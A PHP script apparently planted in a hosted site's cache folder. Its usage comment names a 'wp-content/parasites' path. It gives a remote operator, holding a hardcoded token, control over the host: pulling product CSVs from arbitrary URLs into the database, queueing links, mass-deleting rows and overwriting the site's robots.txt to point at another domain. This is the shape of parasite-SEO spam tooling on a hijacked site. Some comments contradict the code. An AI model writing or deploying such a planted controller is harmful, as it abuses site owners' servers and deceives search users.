File: /home/sioberen/public_html/cache/import_csv.php
<?php
/**
* ===================================================================
* REMOTE CSV to SQLite Importer API
* ===================================================================
* This script acts as an API to import product data from a remote CSV
* file (via URL) into the SQLite database.
*
* It is protected by a secret key authentication.
*
* --- HOW TO USE ---
* Provide the full URL to a CSV file using the 'url' GET parameter
* and the secret key using the 'auth_token' parameter.
* e.g., https://yourdomain.com/wp-content/parasites/import_csv.php?url=http://example.com/products.csv&auth_token=PtXe*JMQ%jT2HS!BSRc4a$$^
* ===================================================================
*/
header('Content-Type: text/plain; charset=utf-8');
// --- Configuration ---
require_once __DIR__ . '/config.php';
define('TABLE_NAME', 'products');
define('SECRET_KEY', 'PtXe*JMQ%jT2HS!BSRc4a$$^');
// --- Helper Functions ---
function initializeQueue($pdo, $output = true) {
try {
if ($output) echo "Starting queue initialization...\n";
// Create queue tables
$pdo->exec("
CREATE TABLE IF NOT EXISTS link_queue (
queue_index INT PRIMARY KEY AUTO_INCREMENT,
product_id INT NOT NULL,
table_name VARCHAR(50) NOT NULL,
INDEX idx_queue_index (queue_index),
INDEX idx_product_table (product_id, table_name)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4
");
$pdo->exec("
CREATE TABLE IF NOT EXISTS link_queue_pointer (
id INT PRIMARY KEY DEFAULT 1,
current_index INT NOT NULL DEFAULT 1,
total_count INT NOT NULL DEFAULT 0,
last_updated TIMESTAMP DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4
");
if ($output) echo "Queue tables created successfully.\n";
// Clear existing queue
$pdo->exec("TRUNCATE TABLE link_queue");
$pdo->exec("DELETE FROM link_queue_pointer WHERE id = 1");
// Get all product tables
$tables = $pdo->query("SHOW TABLES LIKE 'products%'")->fetchAll(PDO::FETCH_COLUMN);
if ($output) echo "Found " . count($tables) . " product tables.\n";
$total_products = 0;
$batch_size = 1000;
$batch_values = array();
// Collect all product IDs from all tables
foreach ($tables as $table) {
if ($output) echo "Processing table: {$table}\n";
$stmt = $pdo->query("SELECT id FROM `$table` ORDER BY RAND()");
while ($row = $stmt->fetch(PDO::FETCH_ASSOC)) {
$batch_values[] = "(" . (int)$row['id'] . ", '" . $table . "')";
$total_products++;
// Insert in batches for performance
if (count($batch_values) >= $batch_size) {
$sql = "INSERT INTO link_queue (product_id, table_name) VALUES " . implode(',', $batch_values);
$pdo->exec($sql);
$batch_values = array();
if ($output) echo "Inserted batch, total so far: {$total_products}\n";
}
}
}
// Insert remaining items
if (!empty($batch_values)) {
$sql = "INSERT INTO link_queue (product_id, table_name) VALUES " . implode(',', $batch_values);
$pdo->exec($sql);
}
// Initialize pointer
$pdo->exec("INSERT INTO link_queue_pointer (id, current_index, total_count) VALUES (1, 1, {$total_products}) ON DUPLICATE KEY UPDATE current_index = 1, total_count = {$total_products}");
if ($output) echo "Queue initialization completed! Total products in queue: {$total_products}\n";
return $total_products;
} catch (Exception $e) {
if ($output) echo "Error initializing queue: " . $e->getMessage() . "\n";
error_log("Error initializing queue: " . $e->getMessage());
return false;
}
}
function updateQueueAfterImport($pdo, $output = true) {
try {
// Check if queue tables exist
$tables_exist = $pdo->query("SHOW TABLES LIKE 'link_queue'")->fetchColumn();
if (!$tables_exist) {
if ($output) echo "Queue tables don't exist, performing full initialization...\n";
return initializeQueue($pdo, $output);
}
if ($output) echo "Updating queue with new products (preserving current pointer)...\n";
// Get current pointer position (preserve it)
$pointer_stmt = $pdo->query("SELECT current_index FROM link_queue_pointer WHERE id = 1");
$current_pointer = $pointer_stmt->fetchColumn();
// Get all product tables
$tables = $pdo->query("SHOW TABLES LIKE 'products%'")->fetchAll(PDO::FETCH_COLUMN);
if ($output) echo "Found " . count($tables) . " product tables.\n";
// Get current products in queue to avoid duplicates
$existing_products = array();
$existing_stmt = $pdo->query("SELECT CONCAT(product_id, '-', table_name) FROM link_queue");
while ($row = $existing_stmt->fetch(PDO::FETCH_COLUMN)) {
$existing_products[$row] = true;
}
$new_products = 0;
$batch_size = 1000;
$batch_values = array();
// Add only new products to queue
foreach ($tables as $table) {
if ($output) echo "Checking table: {$table} for new products\n";
$stmt = $pdo->query("SELECT id FROM `$table`");
while ($row = $stmt->fetch(PDO::FETCH_ASSOC)) {
$product_key = $row['id'] . '-' . $table;
// Only add if not already in queue
if (!isset($existing_products[$product_key])) {
$batch_values[] = "(" . (int)$row['id'] . ", '" . $table . "')";
$new_products++;
// Insert in batches for performance
if (count($batch_values) >= $batch_size) {
$sql = "INSERT INTO link_queue (product_id, table_name) VALUES " . implode(',', $batch_values);
$pdo->exec($sql);
$batch_values = array();
if ($output) echo "Added batch, new products so far: {$new_products}\n";
}
}
}
}
// Insert remaining items
if (!empty($batch_values)) {
$sql = "INSERT INTO link_queue (product_id, table_name) VALUES " . implode(',', $batch_values);
$pdo->exec($sql);
}
// Update total count only if we added new products or if current pointer doesn't exist
if ($new_products > 0 || $current_pointer === false) {
$total_count_stmt = $pdo->query("SELECT COUNT(*) FROM link_queue");
$total_count = $total_count_stmt->fetchColumn();
// Update total count while preserving current_index
if ($current_pointer !== false) {
$pdo->prepare("UPDATE link_queue_pointer SET total_count = ? WHERE id = 1")->execute([$total_count]);
if ($output) echo "Queue updated! Added {$new_products} new products. Total: {$total_count}. Pointer preserved at: {$current_pointer}\n";
} else {
// If no pointer exists, initialize it
$pdo->exec("INSERT INTO link_queue_pointer (id, current_index, total_count) VALUES (1, 1, {$total_count})");
if ($output) echo "Queue updated! Added {$new_products} new products. Total: {$total_count}. Pointer initialized at: 1\n";
}
} else {
if ($output) echo "Queue is up to date. No new products to add. Pointer preserved at: {$current_pointer}\n";
}
return $new_products;
} catch (Exception $e) {
if ($output) echo "Error updating queue: " . $e->getMessage() . "\n";
error_log("Error updating queue: " . $e->getMessage());
return false;
}
}
function generateSitemap($pdo = null, $output = true) {
try {
// 安全获取域名,使用config.php中的配置作为默认值
$domain = isset($host) ? $host : 'localhost';
if (empty($domain) || $domain === 'localhost') {
// 从config.php中获取A站域名
require_once __DIR__ . '/config.php';
$domain = parse_url(ASITE_DOMAIN, PHP_URL_HOST);
}
// 只生成robots.txt,sitemap改为动态接口
$robots = "User-agent: *\nAllow: /\n";
$robots .= "Sitemap: https://" . $domain . "/sitemap.xml";
$robots_file = dirname(__DIR__, 2) . '/robots.txt';
// 强制覆盖文件
if (file_put_contents($robots_file, $robots) === false) {
throw new Exception("Failed to write robots.txt file to: " . $robots_file);
}
if ($output) echo "Robots.txt written to: " . $robots_file . "\n";
if ($output) echo "Content: " . $robots . "\n";
if ($output) echo "Robots.txt updated successfully. Sitemap is now dynamic.\n";
return true;
} catch (Exception $e) {
if ($output) echo "Error generating robots.txt: " . $e->getMessage() . "\n";
error_log("Error generating robots.txt: " . $e->getMessage());
return false;
}
}
// --- Queue Management Interface ---
if (isset($_GET['action']) && $_GET['action'] === 'init_queue') {
if (!isset($_GET['auth_token']) || $_GET['auth_token'] !== SECRET_KEY) {
http_response_code(401);
exit("Authentication failed.\n");
}
set_time_limit(0);
$pdo = new PDO(DB_DSN, DB_USER, DB_PASS);
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$result = initializeQueue($pdo, true);
if ($result === false) {
http_response_code(500);
}
exit;
}
// --- Sitemap Generation Interface ---
if (isset($_GET['action']) && $_GET['action'] === 'sitemap') {
try {
echo "Starting sitemap generation...\n";
if (!isset($_GET['auth_token']) || $_GET['auth_token'] !== SECRET_KEY) {
http_response_code(401);
exit("Authentication failed.\n");
}
echo "Authentication successful.\n";
echo "Generating robots.txt...\n";
$result = generateSitemap(null, true);
if ($result === false) {
http_response_code(500);
exit("Robots.txt generation failed.\n");
} else {
echo "robots.txt updated successfully.\n";
}
exit;
} catch (Exception $e) {
http_response_code(500);
echo "Error: " . $e->getMessage() . "\n";
error_log("Sitemap generation error: " . $e->getMessage());
exit;
}
}
// --- Product Cleanup Interface ---
if (isset($_GET['action']) && $_GET['action'] === 'cleanup_products') {
if (!isset($_GET['auth_token']) || $_GET['auth_token'] !== SECRET_KEY) {
http_response_code(401);
exit("Authentication failed.\n");
}
try {
// Define how many of the latest products you want to keep
$products_to_keep = isset($_GET['keep']) && is_numeric($_GET['keep']) && $_GET['keep'] > 0
? (int)$_GET['keep']
: 700000;
echo "Starting product cleanup process...\n";
echo "The goal is to keep the latest {$products_to_keep} products.\n\n";
// For long-running operations
set_time_limit(0);
$pdo = new PDO(DB_DSN, DB_USER, DB_PASS);
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
echo "Successfully connected to the database.\n";
// First, count the total number of products
$count_stmt = $pdo->query("SELECT COUNT(*) FROM " . TABLE_NAME);
$total_products = (int) $count_stmt->fetchColumn();
echo "Found {$total_products} total products in the table.\n";
if ($total_products <= $products_to_keep) {
exit("No cleanup needed. The number of products ({$total_products}) is already at or below the target of {$products_to_keep}.\n");
}
// This SQL query deletes all records EXCEPT the top 100,000 newest ones (ordered by ID descending).
// It uses a LEFT JOIN to identify rows to delete, which is efficient and avoids MySQL subquery limitations.
$sql = "
DELETE p1 FROM " . TABLE_NAME . " AS p1
LEFT JOIN (
SELECT id FROM " . TABLE_NAME . " ORDER BY id DESC LIMIT " . $products_to_keep . "
) AS p2 ON p1.id = p2.id
WHERE p2.id IS NULL;
";
echo "Executing deletion query. This may take some time...\n";
// Execute the query and get the number of deleted rows
$deleted_count = $pdo->exec($sql);
echo "\nCleanup Complete!\n";
echo "Successfully deleted {$deleted_count} old products.\n";
$final_count_stmt = $pdo->query("SELECT COUNT(*) FROM " . TABLE_NAME);
$final_total_products = (int) $final_count_stmt->fetchColumn();
echo "There are now {$final_total_products} products remaining in the table.\n";
// Auto-rebuild queue system after cleanup
echo "\n=== Auto-rebuilding Queue System ===\n";
$queue_result = initializeQueue($pdo, true);
if ($queue_result !== false) {
echo "\n=== Auto-generating Sitemap ===\n";
$sitemap_result = generateSitemap($pdo, true);
if ($sitemap_result !== false) {
echo "robots.txt updated.\n";
}
}
} catch (Exception $e) {
http_response_code(500);
error_log("Error during product cleanup: " . $e->getMessage());
echo "\nAN ERROR OCCURRED during cleanup:\n";
echo $e->getMessage() . "\n";
}
exit;
}
// --- Main Logic ---
$temp_file_path = null; // Initialize to null
try {
// 0. Authenticate the request
if (!isset($_GET['auth_token']) || $_GET['auth_token'] !== SECRET_KEY) {
http_response_code(401); // Unauthorized
throw new Exception("Authentication failed. Invalid or missing authentication token.");
}
echo "Authentication successful.\n";
// 1. Get and validate the remote CSV URL from the GET parameter
if (!isset($_GET['url']) || empty($_GET['url'])) {
throw new Exception("Mandatory 'url' GET parameter is missing. Please provide the URL of the CSV file.");
}
$remote_csv_url = $_GET['url'];
if (filter_var($remote_csv_url, FILTER_VALIDATE_URL) === false) {
throw new Exception("Invalid URL format provided: " . htmlspecialchars($remote_csv_url));
}
$url_parts = parse_url($remote_csv_url);
if (!isset($url_parts['scheme']) || !in_array($url_parts['scheme'], ['http', 'https'])) {
throw new Exception("Invalid URL scheme. Only HTTP and HTTPS URLs are allowed.");
}
echo "Processing URL: " . htmlspecialchars($remote_csv_url) . "\n\n";
// 2. Download the remote file to a temporary local file
$temp_file_path = tempnam(sys_get_temp_dir(), 'csv_import_');
if ($temp_file_path === false) {
throw new Exception("Could not create temporary file.");
}
$success = @copy($remote_csv_url, $temp_file_path);
if (!$success) {
$error = error_get_last();
$error_message = isset($error['message']) ? $error['message'] : 'Unknown error';
throw new Exception("Failed to download remote CSV file. Reason: " . $error_message);
}
echo "Successfully downloaded remote file to temporary location.\n";
// 3. Connect to MySQL Database
$pdo = new PDO(DB_DSN, DB_USER, DB_PASS);
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
echo "Successfully connected to the database.\n";
// 4. Create the products table ONLY if it doesn't exist.
$pdo->exec("
CREATE TABLE IF NOT EXISTS " . TABLE_NAME . " (
id INT PRIMARY KEY,
title TEXT,
price_current DECIMAL(10, 2),
price_original DECIMAL(10, 2),
description LONGTEXT,
images TEXT,
category TEXT,
source_url TEXT,
crawled_at VARCHAR(255),
status VARCHAR(50)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4
");
// Create index with error handling for MySQL compatibility
try {
$pdo->exec("CREATE INDEX idx_category ON " . TABLE_NAME . " (category(255))");
} catch (PDOException $e) {
// Index might already exist, ignore error 1061 (Duplicate key name)
if ($e->getCode() != '42000' || strpos($e->getMessage(), 'Duplicate key name') === false) {
throw $e;
}
}
echo "Database table '" . TABLE_NAME . "' is ready.\n";
// 5. Read the temporary CSV and insert/update data
$fileHandle = fopen($temp_file_path, 'r');
if ($fileHandle === false) {
throw new Exception("Could not open temporary CSV file.");
}
// Skip the header row of the CSV
fgetcsv($fileHandle);
$stmt = $pdo->prepare(
"REPLACE INTO " . TABLE_NAME . " (id, title, price_current, price_original, description, images, category, source_url, crawled_at, status)
VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?)"
);
// Prepare queue management statements
$check_queue_stmt = $pdo->prepare("SELECT 1 FROM link_queue WHERE product_id = ? AND table_name = ? LIMIT 1");
$insert_queue_stmt = $pdo->prepare("INSERT INTO link_queue (product_id, table_name) VALUES (?, ?)");
$update_count_stmt = $pdo->prepare("UPDATE link_queue_pointer SET total_count = total_count + 1 WHERE id = 1");
$rowCount = 0;
$newProductsInQueue = 0;
$pdo->beginTransaction();
while (($row = fgetcsv($fileHandle)) !== false) {
if (count($row) === 10) {
$product_id = (int)$row[0];
$stmt->execute($row);
$rowCount++;
// Check if queue tables exist and add new products to queue
try {
$check_queue_stmt->execute([$product_id, TABLE_NAME]);
$exists = $check_queue_stmt->fetch();
if (!$exists) {
$insert_queue_stmt->execute([$product_id, TABLE_NAME]);
$update_count_stmt->execute();
$newProductsInQueue++;
}
} catch (PDOException $e) {
// Queue tables might not exist yet, ignore queue operations
if ($e->getCode() != '42S02') { // Table doesn't exist error
error_log("Queue maintenance error: " . $e->getMessage());
}
}
}
}
$pdo->commit();
fclose($fileHandle);
echo "\nImport Complete!\n";
echo "Successfully processed " . $rowCount . " products from " . htmlspecialchars(basename($remote_csv_url)) . ".\n";
if ($newProductsInQueue > 0) {
echo "Added " . $newProductsInQueue . " new products to link queue.\n";
}
// Auto-update queue and sitemap after import (preserving pointer position)
echo "\n=== Auto-updating Queue System ===\n";
$queue_result = updateQueueAfterImport($pdo, true);
if ($queue_result !== false) {
echo "\n=== Auto-generating Sitemap ===\n";
$sitemap_result = generateSitemap($pdo, true);
if ($sitemap_result !== false) {
echo "robots.txt updated.\n";
}
}
} catch (Exception $e) {
http_response_code(500);
echo "\nAN ERROR OCCURRED:\n";
echo $e->getMessage() . "\n";
if (isset($pdo) && $pdo->inTransaction()) {
$pdo->rollBack();
echo "Database transaction has been rolled back.\n";
}
} finally {
// 6. Clean up: always delete the temporary file if it was created.
if ($temp_file_path && file_exists($temp_file_path)) {
unlink($temp_file_path);
echo "\nTemporary file has been deleted.\n";
}
}
// --- Queue Status Check Interface (for debugging) ---
if (isset($_GET['action']) && $_GET['action'] === 'queue_status') {
if (!isset($_GET['auth_token']) || $_GET['auth_token'] !== SECRET_KEY) {
http_response_code(401);
exit("Authentication failed.\n");
}
try {
$pdo = new PDO(DB_DSN, DB_USER, DB_PASS);
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
// Check if queue tables exist
$tables_exist = $pdo->query("SHOW TABLES LIKE 'link_queue'")->fetchColumn();
if (!$tables_exist) {
echo "Queue tables do not exist yet.\n";
exit;
}
// Get pointer status
$pointer_stmt = $pdo->query("SELECT current_index, total_count, last_updated FROM link_queue_pointer WHERE id = 1");
$pointer_data = $pointer_stmt->fetch(PDO::FETCH_ASSOC);
if (!$pointer_data) {
echo "Queue pointer not initialized.\n";
exit;
}
// Get actual queue count
$actual_count_stmt = $pdo->query("SELECT COUNT(*) FROM link_queue");
$actual_count = $actual_count_stmt->fetchColumn();
// Get sample products from current pointer position
$current_index = (int)$pointer_data['current_index'];
$sample_stmt = $pdo->prepare("
SELECT product_id, table_name
FROM link_queue
WHERE queue_index >= ? AND queue_index < ?
ORDER BY queue_index
");
$sample_stmt->execute([$current_index, $current_index + 5]);
$sample_products = $sample_stmt->fetchAll(PDO::FETCH_ASSOC);
echo "=== Queue Status Report ===\n";
echo "Current Pointer Position: {$pointer_data['current_index']}\n";
echo "Recorded Total Count: {$pointer_data['total_count']}\n";
echo "Actual Queue Count: {$actual_count}\n";
echo "Last Updated: {$pointer_data['last_updated']}\n";
echo "Count Match: " . ($pointer_data['total_count'] == $actual_count ? "✓ YES" : "✗ NO") . "\n";
echo "\nNext 5 products from current pointer:\n";
foreach ($sample_products as $i => $product) {
echo " " . ($current_index + $i) . ": Product #{$product['product_id']} from {$product['table_name']}\n";
}
} catch (Exception $e) {
http_response_code(500);
echo "Error checking queue status: " . $e->getMessage() . "\n";
}
exit;
}
?>